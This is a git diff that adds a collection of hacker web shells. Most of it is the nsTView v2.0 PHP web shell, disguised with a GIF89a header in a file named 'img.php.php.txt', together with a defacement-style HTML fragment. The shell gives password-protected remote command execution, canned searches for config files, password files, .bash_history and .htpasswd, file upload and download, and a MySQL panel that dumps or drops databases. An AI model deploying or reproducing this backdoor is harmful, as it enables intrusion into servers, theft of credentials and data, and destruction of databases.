+?>
+<BODY><IMG style="WIDTH: 306px; HEIGHT: 76px" height=100 
+src="http://www.nettekiadres.com/imhabirligi.jpg" width=282></BODY>
+<br><Center>SU AN <A href="http://www.imhabirligi.com">iMHaBiRLiGi</A> HUDUTLARINDA BULUNMAKTASINIZ.!!</Center>
+<FONT 
+class=footmsg><EMBED src=http://www.imhabirligi.com/r1/hurl.asx hidden=true 
+type="text/plain; charset=iso-8859-9" 
+AUTOSTART="TRUE">
+<script language=JavaScript>
+<!--
+
+var message="";
+///////////////////////////////////
+function clickIE() {if (document.all) {(message);return false;}}
+function clickNS(e) {if 
+(document.layers||(document.getElementById&&!document.all)) {
+if (e.which==2||e.which==3) {(message);return false;}}}
+if (document.layers) 
+{document.captureEvents(Event.MOUSEDOWN);document.onmousedown=clickNS;}
+else{document.onmouseup=clickNS;document.oncontextmenu=clickIE;}
+
+document.oncontextmenu=new Function("return false")
+// --> 
+</script>
\ No newline at end of file
diff --git a/xakep-shells/PHP/img.php.php.txt b/xakep-shells/PHP/img.php.php.txt
new file mode 100644
index 0000000..2c8b999
--- /dev/null
+++ b/xakep-shells/PHP/img.php.php.txt
@@ -0,0 +1,2106 @@
+GIF89a
+<?
+@session_start();
+@set_time_limit(0);
+@set_magic_quotes_runtime(0);
+@error_reporting(0);
+#####cfg#####
+# use password  true / false #
+$create_password = true;
+$password = "nst";    // default password for nstview, you can change it.
+
+# UNIX COMMANDS
+# description (nst) command
+# example: Shutdown (nst) shutdown -h now
+$fast_commands = "
+Show open ports (nst) netstat -an | grep LISTEN | grep tcp
+last root (nst) last root
+last (all users) (nst) last all
+Find all config.php in / (nst) find / -type f -name config.php
+Find all config.php in . (nst) find . -type f -name config.php
+Find all admin.php in / (nst) find / -type f -name admin.php
+Find all admin.php in . (nst) find . -type f -name admin.php
+Find all config.inc.php in / (nst) find / -type f -name config.inc.php
+Find all config.inc.php in . (nst) find . -type f -name config.inc.php
+Find all config.inc in / (nst) find / -type f -name config.inc
+Find all config.inc in . (nst) find . -type f -name config.inc
+Find all config.dat in / (nst) find / -type f -name config.dat
+Find all config.dat in . (nst) find . -type f -name config.dat
+Find all config* in / (nst) find / -type f -name config*
+Find all config* in . (nst) find . -type f -name config*
+Find all pass* in / (nst) find / -type f -name pass*
+Find all pass* in . (nst) find . -type f -name pass*
+Find all .bash_history in / (nst) find / -type f -name .bash_history
+Find all .bash_history in . (nst) find . -type f -name .bash_history
+Find all .htpasswd  in / (nst) find / -type f -name .htpasswd
+Find all .htpasswd  in . (nst) find . -type f -name .htpasswd
+Find all writable dirs/files in / (nst) find / -perm -2 -ls
+Find all writable dirs/files in . (nst) find . -perm -2 -ls
+Find all suid files in / (nst) find / -type f -perm -04000 -ls
+Find all suid files in . (nst) find . -type f -perm -04000 -ls
+Find all sgid files in / (nst) find / -type f -perm -02000 -ls
+Find all sgid files in . (nst) find . -type f -perm -02000 -ls
+Find all .fetchmailrc files in / (nst) find / -type f -name .fetchmailrc
+Find all .fetchmailrc files in . (nst) find . -type f -name .fetchmailrc
+OS Version? (nst) sysctl -a | grep version
+Kernel version? (nst) cat /proc/version
+cat syslog.conf (nst) cat /etc/syslog.conf
+Cat - Message of the day (nst) cat /etc/motd
+Cat hosts (nst) cat /etc/hosts
+Distrib name (nst) cat /etc/issue.net
+Distrib name (2) (nst) cat /etc/*-realise
+Display all process - wide output (nst) ps auxw
+Display all your process (nst) ps ux
+Interfaces (nst) ifconfig
+CPU? (nst) cat /proc/cpuinfo
+RAM (nst) free -m
+HDD space (nst) df -h
+List of Attributes (nst) lsattr -a
+Mount options (nst) cat /etc/fstab
+Is cURL installed? (nst) which curl
+Is wGET installed? (nst) which wget
+Is lynx installed? (nst) which lynx
+Is links installed? (nst) which links
+Is fetch installed? (nst) which fetch
+Is GET installed? (nst) which GET
+Is perl installed? (nst) which perl
+Where is apache (nst) whereis apache
+Where is perl (nst) whereis perl
+locate proftpd.conf (nst) locate proftpd.conf
+locate httpd.conf (nst) locate httpd.conf
+locate my.conf (nst) locate my.conf
+locate psybnc.conf (nst) locate psybnc.conf
+";
+
+
+
+# WINDOWS COMMANDS
+# description (nst) command
+# example: Delete autoexec.bat (nst) del c:\autoexec.bat
+$fast_commands_win = "
+OS Version (nst) ver
+Tasklist  (nst) tasklist
+Attributes in . (nst) attrib
+Show open ports (nst) netstat -an
+";
+
+
+
+
+
+######ver####
+$ver= "v2.0";
+#############
+$pass=$_POST['pass'];
+if($pass==$password){
+$_SESSION['nst']="$pass";
+}
+if ($_SERVER["HTTP_CLIENT_IP"]) $ip = $_SERVER["HTTP_CLIENT_IP"];
+else if($_SERVER["HTTP_X_FORWARDED_FOR"]) $ip = $_SERVER["HTTP_X_FORWARDED_FOR"];
+else if($_SERVER["REMOTE_ADDR"]) $ip = $_SERVER["REMOTE_ADDR"];
+else $ip = $_SERVER['REMOTE_ADDR'];
+$ip=htmlspecialchars($ip);
+
+if($create_password==true){
+
+if(!isset($_SESSION['nst']) or $_SESSION['nst']!=$password){
+die("
+<title>nsTView $ver:: nst.void.ru</title>
+<center>
+<table width=100 bgcolor=#D7FFA8 border=1 bordercolor=black><tr><td>
+<font size=1 face=verdana><center>
+<b>nsTView $ver :: <a href=http://nst.void.ru style='text-decoration:none;'><font color=black>nst.void.ru</font></a><br></b>
+</center>
+<form method=post>
+Password:<br>
+<input type=password name=pass size=30 tabindex=1>
+</form>
+<b>Host:</b> ".$_SERVER["HTTP_HOST"]."<br>
+<b>IP:</b> ".gethostbyname($_SERVER["HTTP_HOST"])."<br>
+<b>Your ip:</b> ".$ip."
+</td></tr></table>
+");}
+
+}
+$d=$_GET['d'];
+
+function adds($editf){
+#if(get_magic_quotes_gpc()==0){
+$editf=addslashes($editf);
+#}
+return $editf;
+}
+function adds2($editf){
+if(get_magic_quotes_gpc()==0){
+$editf=addslashes($editf);
+}
+return $editf;
+}
+
+$f   = "nst_sql.txt";
+$f_d = $_GET['f_d'];
+
+if($_GET['download']){
+$download=$_GET['download'];
+header("Content-disposition: attachment; filename=\"$download\";");
+readfile("$d/$download");
+exit;}
+
+if($_GET['dump_download']){
+header("Content-disposition: attachment; filename=\"$f\";");
+header("Content-length: ".filesize($f_d."/".$f));
+header("Expires: 0");
+readfile($f_d."/".$f);
+if(is_writable($f_d."/".$f)){
+unlink($f_d."/".$f);
+}
+die;
+}
+
+
+$images=array(".gif",".jpg",".png",".bmp",".jpeg");
+$whereme=getcwd();
+@$d=@$_GET['d'];
+$copyr = "<center><a href=http://nst.void.ru target=_blank>nsTView $ver<br>o... Network security team ...o</a>";
+$php_self=@$_SERVER['PHP_SELF'];
+if(@eregi("/",$whereme)){$os="unix";}else{$os="win";}
+if(!isset($d)){$d=$whereme;}
+$d=str_replace("\\","/",$d);
+if(@$_GET['p']=="info"){
+@phpinfo();
+exit;}
+if(@$_GET['img']=="1"){
+@$e=$_GET['e'];
+header("Content-type: image/gif");
+readfile("$d/$e");
+}
+if(@$_GET['getdb']=="1"){
+header('Content-type: application/plain-text');
+header('Content-Disposition: attachment; filename=nst-mysql-damp.htm');
+}
+print "<title>nsT View $ver</title>
+<style>
+BODY, TD, TR {
+text-decoration: none;
+font-family: Verdana;
+font-size: 8pt;
+SCROLLBAR-FACE-COLOR: #363d4e;
+SCROLLBAR-HIGHLIGHT-COLOR: #363d4e;
+SCROLLBAR-SHADOW-COLOR: #363d4e;
+SCROLLBAR-ARROW-COLOR: #363d4e;
+SCROLLBAR-TRACK-COLOR: #91AAFF
+}
+input, textarea, select {
+font-family: Verdana;
+font-size: 10px;
+color: black;
+background-color: white;
+border: solid 1px;
+border-color: black
+}
+UNKNOWN {
+COLOR: #0006DE;
+TEXT-DECORATION: none
+}
+A:link {
+COLOR: #0006DE;
+TEXT-DECORATION: none
+}
+A:hover {
+COLOR: #FF0C0B;
+TEXT-DECORATION: none
+}
+A:active {
+COLOR: #0006DE;
+TEXT-DECORATION: none
+}
+A:visited {
+TEXT-DECORATION: none
+}
+</style>
+<script>
+function ShowOrHide(d1, d2) {
+if (d1 != '') DoDiv(d1);
+if (d2 != '') DoDiv(d2);}
+
+function DoDiv(id) {
+var item = null;
+if (document.getElementById) {
+item = document.getElementById(id);
+} else if (document.all){
+item = document.all[id];
+} else if (document.layers){
+item = document.layers[id];}
+if (!item) {}
+else if (item.style) {
+if (item.style.display == \"none\"){ item.style.display = \"\"; }
+else {item.style.display = \"none\"; }
+}else{ item.visibility = \"show\"; }}
+
+function cwd(text){
+document.shellForm.sh.value+=\" \"+ text;
+document.shellForm.sh.focus();
+}
+
+
+</script>
+";
+print "<body vlink=#0006DE>
+<table width=600 border=0 cellpadding=0 cellspacing=1 bgcolor=#D7FFA8 align=center>
+<tr><td><font face=wingdings size=2>0</font>";
+$expl=explode("/",$d);
+$coun=count($expl);
+if($os=="unix"){echo "<a href='$php_self?d=/'>/</a>";}
+else{
+        echo "<a href='$php_self?d=$expl[0]'>$expl[0]/</a>";}
+for($i=1; $i<$coun; $i++){
+        @$xx.=$expl[$i]."/";
+$sls="<a href='$php_self?d=$expl[0]/$xx'>$expl[$i]</a>/";
+$sls=str_replace("//","/",$sls);
+$sls=str_replace("/'></a>/","/'></a>",$sls);
+print $sls;
+}
+if(@ini_get("register_globals")){$reg_g="ON";}else{$reg_g="OFF";}
+if(@ini_get("safe_mode")){$safe_m="ON";}else{$safe_m="OFF";}
+echo "</td></tr>";
+if($os=="unix"){ echo "
+<tr><td><b>id:</b> ".@exec('id')."</td></tr>
+<tr><td><b>uname -a:</b> ".@exec('uname -a')."</td></tr>";} echo"
+<tr><td><b>Your IP: [<font color=#5F3CC1>$ip</font>] Server IP: [<font color=#5F3CC1>".gethostbyname($_SERVER["HTTP_HOST"])."</font>] Server <a href=# title='Host.Domain'>H.D.</a>: [<font color=#5F3CC1>".$_SERVER["HTTP_HOST"]."</font>]</b><br>
+[<b>Safe mode:</b> $safe_m] [<b>Register globals:</b> $reg_g]<br>
+[<a href=# onClick=location.href=\"javascript:history.back(-1)\">Back</a>]
+[<a href='$php_self'>Home</a>]
+[<a href='$php_self?d=$d&shell=1'>Shell (1)</a> <a href='$php_self?d=$d&shell=2'>(2)</a>]
+[<a href='$php_self?d=$d&t=upload'>Upload</a>]
+[<a href='$php_self?t=tools'>Tools</a>]
+[<a href='$php_self?p=info'>PHPinfo</a>]
+[<a href='$php_self?delfolder=$d&d=$d&delfl=1&rback=$d' title='$d'>DEL Folder</a>]
+[<a href='$php_self?p=sql'>SQL</a>]
+[<a href='$php_self?p=selfremover'>Self Remover</a>]
+</td></tr>
+";
+if($os=="win"){ echo "
+<tr><td bgcolor=white>
+<center><font face=wingdings size=2><</font>
+<a href='$php_self?d=a:/'>A</a>
+<a href='$php_self?d=b:/'>B</a>
+<a href='$php_self?d=c:/'>C</a>
+<a href='$php_self?d=d:/'>D</a>
+<a href='$php_self?d=e:/'>E</a>
+<a href='$php_self?d=f:/'>F</a>
+<a href='$php_self?d=g:/'>G</a>
+<a href='$php_self?d=h:/'>H</a>
+<a href='$php_self?d=i:/'>I</a>
+<a href='$php_self?d=j:/'>J</a>
+<a href='$php_self?d=k:/'>K</a>
+<a href='$php_self?d=l:/'>L</a>
+<a href='$php_self?d=m:/'>M</a>
+<a href='$php_self?d=n:/'>N</a>
+<a href='$php_self?d=o:/'>O</a>
+<a href='$php_self?d=p:/'>P</a>
+<a href='$php_self?d=q:/'>Q</a>
+<a href='$php_self?d=r:/'>R</a>
+<a href='$php_self?d=s:/'>S</a>
+<a href='$php_self?d=t:/'>T</a>
+<a href='$php_self?d=u:/'>U</a>
+<a href='$php_self?d=v:/'>V</a>
+<a href='$php_self?d=w:/'>W</a>
+<a href='$php_self?d=x:/'>X</a>
+<a href='$php_self?d=y:/'>Y</a>
+<a href='$php_self?d=z:/'>Z</a>
+</td></tr>";}else{echo "<tr><td>&nbsp;</td></tr>";}
+print "<tr><td>
+:: <a href='$php_self?d=$d&mkdir=1'>Create folder</a> ::
+<a href='$php_self?d=$d&mkfile=1'>Create file</a> ::
+<a href='$php_self?d=$d&read_file_safe_mode=1'>Read file if safe mode is On</a> ::
+<a href='$php_self?d=$d&ps_table=1'>PS table</a> ::
+</td></tr>";
+
+if(@$_GET['p']=="sql"){
+print "<tr><td>";
+###
+
+$f_d = $_GET['f_d'];
+if(!isset($f_d)){$f_d=".";}
+if($f_d==""){$f_d=".";}
+
+$php_self=$_SERVER['PHP_SELF'];
+$delete_table=$_GET['delete_table'];
+$tbl=$_GET['tbl'];
+$from=$_GET['from'];
+$to=$_GET['to'];
+$adress=$_POST['adress'];
+$port=$_POST['port'];
+$login=$_POST['login'];
+$pass=$_POST['pass'];
+$adress=$_GET['adress'];
+$port=$_GET['port'];
+$login=$_GET['login'];
+$pass=$_GET['pass'];
+$conn=$_GET['conn'];
+if(!isset($adress)){$adress="127.0.0.1";}
+if(!isset($login)){$login="root";}
+if(!isset($pass)){$pass="";}
+if(!isset($port)){$port="3306";}
+if(!isset($from)){$from=0;}
+if(!isset($to)){$to=50;}
+
+
+?>
+<style>
+table,td{
+color: black;
+font-face: verdana;
+font-size: 11px;
+
+}
+</style>
+<font color=black face=verdana size=1>
+<? if(!$conn){ ?>
+
+<!-- table 1 -->
+<table bgcolor=#D7FFA8>
+<tr><td valign=top>Address:</td><td><form><input name=adress value='<?=$adress?>' size=20><input name=port value='<?=$port?>' size=6></td></tr>
+<tr><Td valign=top>Login: </td><td><input name=login value='<?=$login?>' size=10></td></tr>
+<tr><Td valign=top>Pass:</td><td> <input name=pass value='<?=$pass?>' size=10><input type=hidden name=p value=sql></td></tr>
+<tr><td></td><td><input type=submit name=conn value=Connect></form></td></tr><?}?>
+<tr><td valign=top><? if($conn){ echo "<b>PHP v".@phpversion()."<br>mySQL v".@mysql_get_server_info()."<br>";}?></b></td><td></td></tr>
+</table>
+<!-- end of table 1 -->
+
+
+<?
+$conn=$_GET['conn'];
+$adress=$_GET['adress'];
+$port=$_GET['port'];
+$login=$_GET['login'];
+$pass=$_GET['pass'];
+if($conn){
+
+$serv = @mysql_connect($adress.":".$port, $login,$pass) or die("<font color=red>Error: ".mysql_error()."</font>");
+if($serv){$status="Connected. :: <a href='$php_self?p=sql'>Log out</a>";}else{$status="Disconnected.";}
+print "<b><font color=green>Status: $status<br><br>"; # #D7FFA8
+print "<table cellpadding=0 cellspacing=0 bgcolor=#D7FFA8><tr><td valign=top>";
+print "<br><font color=red>[db]</font><Br>";
+print "<font color=white>";
+$res = mysql_list_dbs($serv);
+while ($str=mysql_fetch_row($res)){
+print "<a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&delete_db=$str[0]' onclick='return confirm(\"DELETE $str[0] ?\")'>[DEL]<a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$str[0]&dump_db=$str[0]&f_d=$d'>[DUMP]</a></a> <b><a href='$php_self?baza=1&db=$str[0]&p=sql&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$str[0]'>$str[0]</a></b><br>";
+$tc++;
+}
+$baza=$_GET['baza'];
+$db=$_GET['db'];
+print "<font color=red>[Total db: $tc]</font><br>";
+if($baza){
+print "<div align=left><font color=green>db: [$db]</div></font><br>";
+$result=@mysql_list_tables($db);
+while($str=@mysql_fetch_array($result)){
+$c=mysql_query ("SELECT COUNT(*) FROM $str[0]");
+$records=mysql_fetch_array($c);
+
+if(strlen($str[0])>$s4ot){$s4ot=strlen($str[0]);}
+if($records[0]=="0"){
+print "<a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&delete_table=$str[0]' onclick='return confirm(\"DELETE $str[0] ?\")' title='Delete $str[0]?'>[D]</a><a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&baza=1&rename_table=$str[0]' title='Rename $str[0]'>[R]</a><font color=red>[$records[0]]</font> <a href='$php_self?vnutr=1&p=sql&vn=$str[0]&baza=1&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$str[0]&ins_new_line=1'>$str[0]</a><br>";
+}else{
+print "<a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&delete_table=$str[0]' onclick='return confirm(\"DELETE $str[0] ?\")' title='Delete $str[0]?'>[D]</a><a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&baza=1&rename_table=$str[0]' title='Rename $str[0]'>[R]</a><font color=red>[$records[0]]</font> <a href='$php_self?vnutr=1&p=sql&vn=$str[0]&baza=1&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$str[0]'>$str[0]</a><br>";
+}
+mysql_free_result($c);
+$total_t++;
+}
+print "<br><B><font color=red>Total tables: $total_t</font></b>";
+                                print "<pre>";
+for($i=0; $i<$s4ot+10; $i++){print "&nbsp;";}
+                                print "</pre>";
+} #end baza
+
+
+
+
+# delete table
+if(isset($delete_table)){
+mysql_select_db($_GET['db']) or die("<font color=red>".mysql_error()."</font>");
+mysql_query("DROP TABLE IF EXISTS $delete_table") or die("<font color=red>".mysql_error()."</font>");
+print "<br><b><font color=green>Table [ $delete_table ] :: Deleted success!</font></b>";
+print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&baza=1\">";
+}
+# end of delete table
+
+# delete database
+if(isset($_GET['delete_db'])){
+mysql_drop_db($_GET['delete_db']) or die("<font color=red>".mysql_error()."</font>");
+print "<br><b><font color=green>Database ".$_GET['delete_db']." :: Deleted Success!";
+print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1\">";
+}
+# end of delete database
+
+# delete row
+if(isset($_POST['delete_row'])){
+$_POST['delete_row'] = base64_decode($_POST['delete_row']);
+mysql_query("DELETE FROM ".$_GET['tbl']." WHERE ".$_POST['delete_row']) or die("<font color=red>".mysql_error()."</font>");
+$del_result = "<br><b><font color=green>Deleted Success!<br>".$_POST['delete_row'];
+print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&vnutr=1&baza=1&vn=".$_GET['vn']."&db=$db&tbl=$tbl\">";
+}
+# end of delete row
+
+
+$vn=$_GET['vn'];
+print "</td><td valign=top>";
+print "<font color=green>Database: $db => $vn</font>";
+
+# edit row
+if(isset($_POST['edit_row'])){
+$edit_row=base64_decode($_POST['edit_row']);
+
+$r_edit = mysql_query("SELECT * FROM $tbl WHERE $edit_row") or die("<font color=red>".mysql_error()."</font>");
+print "<br><br>
+       <table border=0 cellpadding=1 cellspacing=1><tr>
+       <td><b>Row</b></td><td><b>Value</b></td></tr>";
+print  "<form method=post action='$php_self?p=sql&login=".$_GET['login']."&pass=".$_GET['pass']."&adress=".$_GET['adress']."&conn=1&baza=1&tbl=".$_GET['tbl']."&vn=".$_GET['vn']."&db=".$_GET['db']."'>";
+print  "<input type=hidden name=edit_row value='".$_POST['edit_row']."'>";
+print " <input type=radio name=upd value=update checked>Update<br>
+        <input type=radio name=upd value=insert>Insert new<br><br>";
+
+
+$i=0;
+while($mn = mysql_fetch_array($r_edit, MYSQL_ASSOC)){
+foreach($mn as $key =>$val){
+$type  = mysql_field_type($r_edit, $i);
+$len  = mysql_field_len($r_edit, $i);
+$del .= "`$key`='".adds($val)."' AND ";
+$c=strlen($val);
+$val=htmlspecialchars($val, ENT_NOQUOTES);
+$str=" <textarea name='$key' cols=39 rows=5>$val</textarea> ";
+$buff .= "<tr><td bgcolor=silver><b>$key</b><br><font color=green>(<b>$type($len)</b>)</font></td><td>$str</td></tr>";
+$i++;
+}
+
+}
+$delstring=base64_encode($del);
+print "<input type=hidden name=delstring value=\"$delstring\">";
+print "$buff</table><br>";
+print "<br>";
+if(!$_POST['makeupdate']){print "<input type=submit value=Update name=makeupdate></form>";}
+
+
+
+
+if($_POST['makeupdate']){
+if($_POST['upd']=='update'){
+preg_match_all("/name='(.*?)'\scols=39\srows=5>(.*?)<\/textarea>/i",$buff,$matches3);
+$delstring=$_POST['delstring'];
+$delstring=base64_decode($delstring);
+$delstring = substr($delstring, 0, strlen($delstring)-5);
+
+for($i=0; $i<count($matches3[0]); $i++){
+eval("\$".$matches3[1][$i]." = \"".adds2($_POST[$matches3[1][$i]])."\";");
+$total_str .= $matches3[1][$i]."='".adds2($_POST[$matches3[1][$i]])."',";
+}
+$total_str = substr_replace($total_str,"",-1);
+$up_string = "UPDATE `$tbl` SET $total_str WHERE $delstring";
+$up_string = htmlspecialchars($up_string, ENT_NOQUOTES);
+print "<b>PHP var:<br></b>\$sql=\"$up_string\";<br><br>";
+print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&vnutr=1&baza=1&vn=".$_GET['vn']."&db=$db&tbl=$tbl\">";
+mysql_query($up_string) or die("<font color=red>".mysql_error()."</font>");
+}#end of make update
+
+
+
+if($_POST['upd']=='insert'){
+preg_match_all("/name='(.*?)'\scols=39\srows=5>(.*?)<\/textarea>/i",$buff,$matches3);
+$delstring=$_POST['delstring'];
+$delstring=base64_decode($delstring);
+$delstring = substr($delstring, 0, strlen($delstring)-5);
+
+for($i=0; $i<count($matches3[0]); $i++){
+eval("\$".$matches3[1][$i]." = \"".adds2($_POST[$matches3[1][$i]])."\";");
+$total_str .= $matches3[1][$i]."='".adds2($_POST[$matches3[1][$i]])."',,";
+}
+
+$total_str = ",,".$total_str;
+
+preg_match_all("/,(.*?)='(.*?)',/i",$total_str,$matches4);
+
+for($i=0; $i<count($matches4[1]); $i++){
+        $matches4[1][0]=str_replace(",","",$matches4[1][0]);
+        $total_m_i .= "`".$matches4[1][$i]."`,";
+        $total_m_x .= "'".$matches4[2][$i]."',";
+}
+$total_m_i = substr($total_m_i, 0, strlen($total_m_i)-1);
+$total_m_x = substr($total_m_x, 0, strlen($total_m_x)-1);
+
+$make_insert="INSERT INTO `$tbl` ($total_m_i) VALUES ($total_m_x)";
+mysql_query($make_insert) or die("<font color=red>".mysql_error()."</font>");
+print "<b>PHP var:<br></b>\$sql=\"$make_insert\";<br><br>";
+print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&vnutr=1&baza=1&vn=".$_GET['vn']."&db=$db&tbl=$tbl\">";
+}#end of insert
+}#end of update
+}
+# end of edit row
+
+
+# insert new line
+if($_GET['ins_new_line']){
+$qn = mysql_query('SHOW FIELDS FROM '.$tbl) or die("<font color=red>".mysql_error()."</font>");
+print "<form method=post action='$php_self?p=sql&login=".$_GET['login']."&pass=".$_GET['pass']."&adress=".$_GET['adress']."&conn=1&baza=1&tbl=".$_GET['tbl']."&vn=".$_GET['vn']."&db=".$_GET['db']."&ins_new_line=1'>
+Insert new line in <b>$tbl</b> table</b><Br><br>";
+print "<table>";
+while ($new_line = mysql_fetch_array($qn, MYSQL_ASSOC)) {
+foreach ($new_line as $key =>$next) {
+$buff .= "$next ";
+}
+$expl=explode(" ",$buff);
+$buff2 .= $expl[0]." ";
+print "<tr><td bgcolor=silver><b>$expl[0]</b><br><font color=green>(<b>$expl[1]</b>)</font></td>
+<td><textarea name='$expl[0]' cols=39 rows=5></textarea>
+</td></tr>";
+unset($buff);
+}
+print "</table>
+<center><input type=submit value=Insert name=mk_ins></form></center>";
+if($_POST['mk_ins']){
+preg_match_all("/(.*?)\s/i",$buff2,$matches3);
+for($i=0; $i<count($matches3[0]); $i++){
+eval("\$".$matches3[1][$i]." = \"".adds2($_POST[$matches3[1][$i]])."\";");
+$total_str .= $matches3[1][$i]."='".adds2($_POST[$matches3[1][$i]])."',,";
+}
+
+$total_str = ",,".$total_str;
+preg_match_all("/,(.*?)='(.*?)',/i",$total_str,$matches4);
+
+for($i=0; $i<count($matches4[1]); $i++){
+        $matches4[1][0]=str_replace(",","",$matches4[1][0]);
+        $total_m_i .= "`".$matches4[1][$i]."`,";
+        $total_m_x .= "'".$matches4[2][$i]."',";
+}
+$total_m_i = substr($total_m_i, 0, strlen($total_m_i)-1);
+$total_m_x = substr($total_m_x, 0, strlen($total_m_x)-1);
+
+$make_insert="INSERT INTO `$tbl` ($total_m_i) VALUES ($total_m_x)";
+mysql_query($make_insert) or die("<font color=red>".mysql_error()."</font>");
+print "<b>PHP var:<br></b>\$sql=\"$make_insert\";<br><br>";
+print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&vnutr=1&baza=1&vn=".$_GET['vn']."&db=$db&tbl=$tbl\">";
+}#end of mk ins
+}#end of ins new line
+
+
+
+
+
+
+if(isset($_GET['rename_table'])){
+$rename_table=$_GET['rename_table'];
+print "<br><br>Rename <b>$rename_table</b> to<br><br>
+<form method=post action='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&baza=1&rename_table=$rename_table'>
+<input name=new_name size=30><center><br>
+<input type=submit value=Rename></center>
+</form>
+";
+
+if(isset($_POST['new_name'])){
+mysql_select_db($db) or die("<font color=red>".mysql_error()."</font>");
+mysql_query("RENAME TABLE $rename_table TO ".$_POST['new_name']) or die("<font color=red>".mysql_error()."</font>");
+print "<br><font color=green>Table <b>$rename_table</b> renamed to <b>".$_POST['new_name']."</b></font>";
+print "<meta http-equiv=\"REFRESH\" content=\"2;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&db=$db\">";
+}
+
+}#end of rename
+
+
+# dump table
+if($_GET['dump']){
+if(!is_writable($f_d)){die("<br><br><font color=red>This folder $f_d isnt writable!<br>Cannot make dump.<br><br>
+<font color=green><b>You can change temp folder for dump file in your browser!<br>
+<font color=red>Change variable &f_d=(here writable directory, expl: /tmp or c:/windows/temp)</font><br>
+Then press enter</b></font>
+</font>");}
+mysql_select_db($db) or die("<font color=red>".mysql_error()."</font>");
+$fp = fopen($f_d."/".$f,"w");
+fwrite($fp, "# nsTView.php v$ver
+# Web: http://nst.void.ru
+# Dump from: ".$_SERVER["SERVER_NAME"]." (".$_SERVER["SERVER_ADDR"].")
+# MySQL version: ".mysql_get_server_info()."
+# PHP version: ".phpversion()."
+# Date: ".date("d.m.Y - H:i:s")."
+# Dump db ( $db ) Table ( $tbl )
+# --- eof ---
+
+");
+$que = mysql_query("SHOW CREATE TABLE `$tbl`") or die("<font color=red>".mysql_error()."</font>");
+$row = mysql_fetch_row($que);
+fwrite($fp, "DROP TABLE IF EXISTS `$tbl`;\r\n");
+$row[1]=str_replace("\n","\r\n",$row[1]);
+fwrite($fp, $row[1].";\r\n\r\n");
+$que = mysql_query("SELECT * FROM `$tbl`");
+if(mysql_num_rows($que)>0){
+while($row = mysql_fetch_assoc($que)){
+$keys = join("`, `", array_keys($row));
+$values = array_values($row);
+foreach($values as $k=>$v) {$values[$k] = adds2($v);}
+$values = implode("', '", $values);
+$sql = "INSERT INTO `$tbl`(`$keys`) VALUES ('".$values."');\r\n";
+fwrite($fp, $sql);
+}
+}
+fclose($fp);
+print "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&dump_download=1&f_d=$f_d/\">";
+}#end of dump
+
+
+
+
+# db dump
+if($_GET['dump_db']){
+$c=mysql_num_rows(mysql_list_tables($db));
+if($c>=1){
+print "<br><br>&nbsp;&nbsp;&nbsp;Dump database <b>$db</b>";
+}else{
+print "<br><br><font color=red>Cannot dump database. No tables exists in <b>$db</b> db.</font>";
+die;
+}
+if(sizeof($tabs)==0){
+$res = mysql_query("SHOW TABLES FROM $db");
+if(mysql_num_rows($res)>0){
+while($row=mysql_fetch_row($res)){
+$tabs[] .= $row[0];
+}
+}
+}
+$fp = fopen($f_d."/".$f,"w");
+fwrite($fp, "# nsTView.php v$ver
+# Web: http://nst.void.ru
+# Dump from: ".$_SERVER["SERVER_NAME"]." (".$_SERVER["SERVER_ADDR"].")
+# MySQL version: ".mysql_get_server_info()."
+# PHP version: ".phpversion()."
+# Date: ".date("d.m.Y - H:i:s")."
+# Dump db ( $db )
+# --- eof ---
+
+");
+foreach($tabs as $tab) {
+fwrite($fp,"DROP TABLE IF EXISTS `$tab`;\r\n");
+$res = mysql_query("SHOW CREATE TABLE `$tab`");
+$row = mysql_fetch_row($res);
+$row[1]=str_replace("\n","\r\n",$row[1]);
+fwrite($fp, $row[1].";\r\n\r\n");
+$res = mysql_query("SELECT * FROM `$tab`");
+if(mysql_num_rows($res)>0){
+while($row=mysql_fetch_assoc($res)){
+$keys = join("`, `", array_keys($row));
+$values = array_values($row);
+foreach($values as $k=>$v) {$values[$k] = adds2($v);}
+$values = join("', '", $values);
+$sql = "INSERT INTO `$tab`(`$keys`) VALUES ('$values');\r\n";
+fwrite($fp, $sql);
+}}
+fwrite($fp, "\r\n\r\n\r\n");
+}
+fclose($fp);
+print "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&dump_download=1&f_d=$f_d/\">";
+}#end of db dump
+
+
+
+
+
+
+$vnutr=$_GET['vnutr'];
+$tbl=$_GET['tbl'];
+if($vnutr and !$_GET['ins_new_line']){
+print "<table cellpadding=0 cellspacing=1><tr><td>";
+
+mysql_select_db($db) or die(mysql_error());
+$c=mysql_query ("SELECT COUNT(*) FROM $tbl");
+$cfa=mysql_fetch_array($c);
+mysql_free_result($c);
+print "
+Total: $cfa[0]
+<form>
+From: <input name=from size=3 value=0>
+To: <input name=to size=3 value='$cfa[0]'>
+<input type=submit name=show value=Show>
+<input type=hidden name=vnutr value=1>
+<input type=hidden name=vn value='$vn'>
+<input type=hidden name=db value='$db'>
